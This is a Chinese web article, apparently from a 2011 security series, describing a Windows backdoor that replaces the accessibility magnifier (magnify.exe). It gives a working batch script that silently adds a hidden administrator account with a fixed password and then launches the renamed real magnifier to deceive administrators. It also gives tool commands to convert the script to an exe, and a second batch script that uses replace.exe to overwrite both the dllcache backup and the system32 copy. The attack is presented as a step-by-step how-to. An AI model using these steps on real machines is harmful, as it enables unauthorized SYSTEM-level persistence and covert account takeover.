当前位置:首页 > 网络安全 > windows安全 > WINDOWS系统后门实例二图

WINDOWS系统后门实例二图

2011-06-06 | 来源:网络
放大镜程序,最狡猾的后门放大镜程序(magnify.exe)是Windows2000/XP/2003系统集成的一个小工具,它是为方便视力障碍用户而设计的。在用户登录系统前可以通过“Win+U”组合键调用该工具,因此攻

放大镜程序,最狡猾的后门

放大镜程序magnify.exe)是Windows 2000/XP/2003系统集成的一个小工具,它是为方便视力障碍用户而设计的。在用户登录系统前可以通过“Win+U”组合键调用该工具,因此攻击者就用精心构造的magnify.exe同名文件替换放大镜程序,从而达到控制服务器的目的。

通常情况下,攻击者通过构造的magnify.exe程序创建一个管理员用户,然后登录系统。当然有的时候他们也会通过其直接调用命令提示符(cmd.exe)或者系统shell(explorer.exe)。需要说明的是,这样调用的程序都是system权限,即系统最高权限。不过,以防万一当管理员在运行放大镜程序时发现破绽,攻击者一般通过该构造程序完成所需的操作后,最后会运行真正的放大镜程序,以蒙骗管理员。其利用的方法是:

(1)构造批处理脚本

  1. @echo off  
  2.  
  3. net user gslw$ test168 /add  
  4.  
  5. net localgroup administrators gslw$ /add  
  6.  
  7. %Windir%/system32/nagnify.exe  
  8.  
  9. exit 

将上面的脚本保存为magnify.bat,其作用是创建一个密码为test168的管理员用户gslw$,最后运行改名后的放大镜程序nagnify.exe。(图2)

(2)文件格式转换

因为批处理文件magnify.bat的后缀是bat,必须要将其转换为同名的exe文件才可以通过组合键Win+U调用。攻击者一般可以利用WinRar构造一个自动解压的exe压缩文件,当然也可以利用bat2com、com2exe进行文件格式的转换。我们就以后面的方法为例进行演示。

打开命令行,进入bat2com、com2exe工具所在的目录,然后运行命令“bat2com magnify.bat”将magnify.bat转换成magnify.com,继续运行命令“com2exe magnify.com”将magnify.com转换成magnify.exe,这样就把批处理文件转换成和放大镜程序同名的程序文件。(图3)

(3)放大镜文件替换

下面就需要用构造的magnify.exe替换同名的放大镜程序文件,由于Windows对系统文件的自我保护,因此不能直接替换,不过Windows提供了一个命令replace.exe,通过它我们可以替换系统文件。另外,由于系统文件在%Windir%/system32/dllcache中有备份,为了防止文件替换后又重新还原,所有我们首先要替换该目录下的magnify.exe文件。假设构造的magnify.exe文件在%Windir%目录下,我们可以通过一个批处理即可实现文件的替换。

  1. @echo off  
  2.  
  3. copy %Windir%/system32/dllcache/magnify.exe nagnify.exe  
  4.  
  5. copy %Windir%/system32/magnify.exe nagnify.exe  
  6.  
  7. replace.exe %Windir%/magnify.exe %Windir%/system32/dllcache  
  8.  
  9. replace.exe %Windir%/magnify.exe %Windir%/system32  
  10.  
  11. exit 

上面批处理的功能是,首先将放大镜程序备份为nagnify.exe,然后用同名的构造程序将其替换。(图4)

评论

评论数10

表情
发表评论
网友评论仅供其表达个人看法,并不表明网易立场。
《WINDOWS系统后门实例二图》更多评论

阅读下一篇

WINDOWS系统后门实例三

组策略欺骗,最隐蔽的后门组策略后门更加隐蔽。往册表中添加相应键值实现随系统启动而运行是木马常用的伎俩,也为大家所熟知。其实,在最策略中也可以实现该功能,不仅如此它还可以实现在系统关机时进行某些 ... 查看全文

返回windows安全 返回网站首页